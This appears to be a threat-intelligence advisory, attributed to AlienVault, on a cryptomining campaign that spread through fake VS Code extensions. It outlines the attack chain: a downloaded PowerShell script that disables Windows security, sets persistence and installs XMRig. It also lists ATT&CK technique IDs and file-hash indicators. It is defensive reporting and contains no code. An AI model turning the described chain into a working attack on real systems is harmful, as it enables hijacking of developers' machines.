A sophisticated cryptomining campaign has been discovered targeting developers through seemingly legitimate VS Code extensions. The campaign, potentially reaching over one million installations, involves fake extensions published by three different authors. These extensions secretly download a PowerShell script that disables Windows security, establishes persistence, and installs an XMRig cryptominer. The most successful fake extension gained 189K installs. The attackers created a multi-stage attack, even installing legitimate extensions they impersonated to avoid suspicion. The campaign published ten different malicious extensions, with the top three showing unusually high install counts, suggesting artificial inflation. The extensions share identical code and communicate with the same C2 server. The PowerShell script sets up persistence mechanisms, disables Windows security services, and attempts privilege escalation. Author: AlienVault
Related Tags:
T1553.006
T1036.004
T1562.004
T1548.002
XMRig
T1547.001
T1543.003
T1059.001
T1562.001
Associated Indicators:
D2FCF28897DDC2137141D838B734664FF7592E03FCD467A433A51CB4976B4FB1
71B48BC26F4A4F9759EAF35F44E7CEBF4F18E1A74AB2C902F91404CA8CEB3A4E
13DB408A3232EA31AAB8EDC648B6C315782DB9516E1C08C6BD667E17F5DD147C
BB757C6338491170072E8B743EA2758EEBAEB1472BA6B421C950C79A3DAED853
0C05365EA9C1162B10D93FFDC93EB4207B61062D35DBF6D424AD15E3342ECB70
515E6D58B720D5E125602621B28FA37A669EFED508E983B8C3136BEA80D46640
26111B28F6C507EA68E7C8A0F3AD64FB0D7B694D7F703BC626D871C4E1502DC2
2D17F0CB6C8D9488F2D101B90052692049B0C4BD9BF4949758AAE7B1FD936191
F65E63D14DD57EADB262DEAA2B1A8A965A2A962C